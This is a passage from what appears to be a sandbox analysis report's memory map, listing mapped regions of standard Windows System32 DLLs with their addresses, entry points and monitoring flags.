mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 10299 start_va = 0x7ffb12a80000 end_va = 0x7ffb12c01fff monitored = 0 entry_point = 0x7ffb12a982a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 10300 start_va = 0x7ffb12c10000 end_va = 0x7ffb12cb2fff monitored = 0 entry_point = 0x7ffb12c12c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 10301 start_va = 0x7ffb12cc0000 end_va = 0x7ffb12d11fff monitored = 0 entry_point = 0x7ffb12cc5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 10302 start_va = 0x7ffb12d40000 end_va = 0x7ffb12d6dfff monitored = 1 entry_point = 0x7ffb12d42300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 10303 start_va = 0x7ffb12d70000 end_va = 0x7ffb12dcdfff monitored = 0 entry_point = 0x7ffb12d75080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 10304 start_va = 0x7ffb12dd0000 end_va = 0x7ffb12deffff monitored = 0 entry_point = 0x7ffb12dd1f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 10305 start_va = 0x7ffb12df0000 end_va = 0x7ffb12df8fff monitored = 0 entry_point = 0x7ffb12df18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 10306 start_va = 0x7ffb12e00000 end_va = 0x7ffb12e10fff monitored = 0 entry_point = 0x7ffb12e01d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 10307 start_va = 0x7ffb12f30000 end_va = 0x7ffb12faefff monitored = 0 entry_point = 0x7ffb12f47110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 10308 start_va = 0x7ffb12fb0000 end_va = 0x7ffb12febfff monitored = 0 entry_point = 0x7ffb12fb6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 10309 start_va = 0x7ffb13040000 end_va = 0x7ffb1308bfff monitored = 0 entry_point = 0x7ffb13055310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 10310 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 10311 start_va = 0x7ffb14500000 end_va = 0x7ffb14534fff monitored = 0 entry_point = 0x7ffb1450a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 10312 start_va = 0x7ffb16be0000 end_va = 0x7ffb16beffff monitored = 0 entry_point = 0x7ffb16be1690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 10313 start_va = 0x7ffb16bf0000 end_va = 0x7ffb16e69fff monitored = 0 entry_point = 0x7ffb16c0a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 10314 start_va = 0x7ffb19500000 end_va = 0x7ffb19521fff monitored = 0 entry_point = 0x7ffb19512540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 10315 start_va = 0x7ffb19530000 end_va = 0x7ffb19604fff monitored = 0 entry_point = 0x7ffb1954cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 10316 start_va = 0x7ffb196d0000 end_va = 0x7ffb1970ffff monitored = 0 entry_point = 0x7ffb196e6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 10317 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 10318 start_va = 0x7ffb1a350000 end_va = 0x7ffb1a358fff monitored = 0 entry_point = 0x7ffb1a3521d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 10319 start_va = 0x7ffb1a510000 end_va = 0x7ffb1a521fff monitored = 0 entry_point = 0x7ffb1a513580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 10320 start_va = 0x7ffb1a590000 end_va = 0x7ffb1a5a3fff monitored = 0 entry_point = 0x7ffb1a593710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 10321 start_va = 0x7ffb1a5b0000 end_va = 0x7ffb1a5d7fff monitored = 0 entry_point = 0x7ffb1a5befc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 10322 start_va = 0x7ffb1a640000 end_va = 0x7ffb1a65dfff monitored = 0 entry_point = 0x7ffb1a64ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 10323 start_va = 0x7ffb1a9b0000 end_va = 0x7ffb1aa2ffff monitored = 0 entry_point = 0x7ffb1a9dd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 10324 start_va = 0x7ffb1aa70000 end_va = 0x7ffb1aa85fff monitored = 0 entry_point = 0x7ffb1aa71d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 10325 start_va = 0x7ffb1c710000 end_va = 0x7ffb1c719fff monitored = 0 entry_point = 0x7ffb1c7114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 10326 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 10327 start_va = 0x7ffb1d1d0000 end_va = 0x7ffb1d1dffff monitored = 0 entry_point = 0x7ffb1d1d1700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 10328 start_va = 0x7ffb1d1e0000 end_va = 0x7ffb1d1e8fff monitored = 0 entry_point = 0x7ffb1d1e1ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 10329 start_va = 0x7ffb1d1f0000 end_va = 0x7ffb1d21cfff monitored = 0 entry_point = 0x7ffb1d1f2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 10330 start_va = 0x7ffb1d220000 end_va = 0x7ffb1d271fff monitored = 0 entry_point = 0x7ffb1d2238e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 10331 start_va = 0x7ffb1d3f0000 end_va = 0x7ffb1d40afff monitored = 0 entry_point = 0x7ffb1d3f1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 10332 start_va = 0x7ffb1d700000 end_va = 0x7ffb1d70dfff monitored = 0 entry_point = 0x7ffb1d701460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 10333 start_va = 0x7ffb1d8c0000 end_va = 0x7ffb1d959fff monitored = 0 entry_point = 0x7ffb1d8dada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 10334 start_va = 0x7ffb1d960000 end_va = 0x7ffb1d974fff monitored = 0 entry_point = 0x7ffb1d963460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 10335 start_va = 0x7ffb1da70000 end_va = 0x7ffb1dab0fff monitored = 0 entry_point = 0x7ffb1da74840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 10336 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 10337 start_va = 0x7ffb1dc60000 end_va = 0x7ffb1dd1ffff monitored = 0 entry_point = 0x7ffb1dc8fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 10338 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 10339 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 10340 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 10341 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 10342 start_va = 0x7ffb1ddb0000 end_va = 0x7ffb1de95fff monitored = 0 entry_point = 0x7ffb1ddccf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 10343 start_va = 0x7ffb1dff0000 end_va = 0x7ffb1e01dfff monitored = 0 entry_point = 0x7ffb1dff7550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 10344 start_va = 0x7ffb1e020000 end_va = 0x7ffb1e02cfff monitored = 0 entry_point = 0x7ffb1e022ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 10345 start_va = 0x7ffb1e030000 end_va = 0x7ffb1e05efff monitored = 0 entry_point = 0x7ffb1e038910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 10346 start_va = 0x7ffb1e070000 end_va = 0x7ffb1e085fff monitored = 0 entry_point = 0x7ffb1e071b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10347 start_va = 0x7ffb1e130000 end_va = 0x7ffb1e13ffff monitored = 0 entry_point = 0x7ffb1e132c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 10348 start_va = 0x7ffb1e140000 end_va = 0x7ffb1e153fff monitored = 0 entry_point = 0x7ffb1e142d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 10349 start_va = 0x7ffb1e2c0000 end_va = 0x7ffb1e2d1fff monitored = 0 entry_point = 0x7ffb1e2c1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 10350 start_va = 0x7ffb1e440000 end_va = 0x7ffb1e4d2fff monitored = 0 entry_point = 0x7ffb1e449680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 10351 start_va = 0x7ffb1e560000 end_va = 0x7ffb1e577fff monitored = 0 entry_point = 0x7ffb1e561b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 10352 start_va = 0x7ffb1e580000 end_va = 0x7ffb1e59cfff monitored = 0 entry_point = 0x7ffb1e584f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 10353 start_va = 0x7ffb1e5f0000 end_va = 0x7ffb1e608fff monitored = 0 entry_point = 0x7ffb1e5f4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10354 start_va = 0x7ffb1e820000 end_va = 0x7ffb1e88dfff monitored = 0 entry_point = 0x7ffb1e827f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 10355 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 10356 start_va = 0x7ffb1e8b0000 end_va = 0x7ffb1e8f0fff monitored = 0 entry_point = 0x7ffb1e8c7eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 10357 start_va = 0x7ffb1e900000 end_va = 0x7ffb1e9fbfff monitored = 0 entry_point = 0x7ffb1e936df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 10358 start_va = 0x7ffb1ea00000 end_va = 0x7ffb1eaadfff monitored = 0 entry_point = 0x7ffb1ea180c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 10359 start_va = 0x7ffb1eab0000 end_va = 0x7ffb1eac1fff monitored = 0 entry_point = 0x7ffb1eab9260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 10360 start_va = 0x7ffb1ead0000 end_va = 0x7ffb1eb80fff monitored = 0 entry_point = 0x7ffb1eb488b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 10361 start_va = 0x7ffb1eb90000 end_va = 0x7ffb1ebb4fff monitored = 0 entry_point = 0x7ffb1eba2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 10362 start_va = 0x7ffb1ebc0000 end_va = 0x7ffb1ebd0fff monitored = 0 entry_point = 0x7ffb1ebc7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 10363 start_va = 0x7ffb1ebe0000 end_va = 0x7ffb1ebf9fff monitored = 0 entry_point = 0x7ffb1ebe2cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 10364 start_va = 0x7ffb1ec00000 end_va = 0x7ffb1ec0bfff monitored = 0 entry_point = 0x7ffb1ec014d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 10365 start_va = 0x7ffb1ec10000 end_va = 0x7ffb1ec64fff monitored = 0 entry_point = 0x7ffb1ec13fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 10366 start_va = 0x7ffb1ec70000 end_va = 0x7ffb1eca6fff monitored = 0 entry_point = 0x7ffb1ec76020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 10367 start_va = 0x7ffb1ecb0000 end_va = 0x7ffb1eccffff monitored = 0 entry_point = 0x7ffb1ecb39a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 10368 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 10369 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 10370 start_va = 0x7ffb208d0000 end_va = 0x7ffb209ddfff monitored = 0 entry_point = 0x7ffb2091eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 10371 start_va = 0x7ffb20f80000 end_va = 0x7ffb2103efff monitored = 0 entry_point = 0x7ffb20fa1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 10372 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 10373 start_va = 0x7ffb21110000 end_va = 0x7ffb21170fff monitored = 0 entry_point = 0x7ffb21114b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 10374 start_va = 0x7ffb21180000 end_va = 0x7ffb212fbfff monitored = 0 entry_point = 0x7ffb211d1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 10375 start_va = 0x7ffb21300000 end_va = 0x7ffb2130afff monitored = 0 entry_point = 0x7ffb21301770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 10376 start_va = 0x7ffb21310000 end_va = 0x7ffb21326fff monitored = 0 entry_point = 0x7ffb21315630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 10377 start_va = 0x7ffb21330000 end_va = 0x7ffb2136dfff monitored = 0 entry_point = 0x7ffb2133a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10378 start_va = 0x7ffb21370000 end_va = 0x7ffb21396fff monitored = 0 entry_point = 0x7ffb21373bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 10379 start_va = 0x7ffb213a0000 end_va = 0x7ffb213f4fff monitored = 0 entry_point = 0x7ffb213afc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 10380 start_va = 0x7ffb21400000 end_va = 0x7ffb21412fff monitored = 0 entry_point = 0x7ffb214057f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 10381 start_va = 0x7ffb21420000 end_va = 0x7ffb2142bfff monitored = 0 entry_point = 0x7ffb21422830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 10382 start_va = 0x7ffb21430000 end_va = 0x7ffb21439fff monitored = 0 entry_point = 0x7ffb21431660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10383 start_va = 0x7ffb21440000 end_va = 0x7ffb21457fff monitored = 0 entry_point = 0x7ffb21445910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 10384 start_va = 0x7ffb21460000 end_va = 0x7ffb215acfff monitored = 0 entry_point = 0x7ffb214a3da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 10385 start_va = 0x7ffb21640000 end_va = 0x7ffb216d1fff monitored = 0 entry_point = 0x7ffb2168a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 10386 start_va = 0x7ffb21760000 end_va = 0x7ffb217d9fff monitored = 0 entry_point = 0x7ffb21787630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 10387 start_va = 0x7ffb217e0000 end_va = 0x7ffb217fefff monitored = 0 entry_point = 0x7ffb217e4960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 10388 start_va = 0x7ffb218f0000 end_va = 0x7ffb21953fff monitored = 0 entry_point = 0x7ffb21905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 10389 start_va = 0x7ffb21b50000 end_va = 0x7ffb21b85fff monitored = 0 entry_point = 0x7ffb21b60070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 10390 start_va = 0x7ffb22640000 end_va = 0x7ffb22647fff monitored = 0 entry_point = 0x7ffb226413e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 10391 start_va = 0x7ffb22ee0000 end_va = 0x7ffb22f58fff monitored = 0 entry_point = 0x7ffb22effb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 10392 start_va = 0x7ffb23110000 end_va = 0x7ffb235a2fff monitored = 0 entry_point = 0x7ffb2311f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 10393 start_va = 0x7ffb235b0000 end_va = 0x7ffb23616fff monitored = 0 entry_point = 0x7ffb235ce710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 10394 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10395 start_va = 0x7ffb23800000 end_va = 0x7ffb2381bfff monitored = 0 entry_point = 0x7ffb238037a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10396 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 10397 start_va = 0x7ffb239d0000 end_va = 0x7ffb23a0ffff monitored = 0 entry_point = 0x7ffb239e1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 10398 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 10399 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 10400 start_va = 0x7ffb23c40000 end_va = 0x7ffb23d3ffff monitored = 0 entry_point = 0x7ffb23c80f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 10401 start_va = 0x7ffb23dd0000 end_va = 0x7ffb23ddbfff monitored = 0 entry_point = 0x7ffb23dd2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 10402 start_va = 0x7ffb23ea0000 end_va = 0x7ffb23ed1fff monitored = 0 entry_point = 0x7ffb23eb2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 10403 start_va = 0x7ffb24110000 end_va = 0x7ffb2411bfff monitored = 0 entry_point = 0x7ffb24112790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 10404 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 10405 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 10406 start_va = 0x7ffb24410000 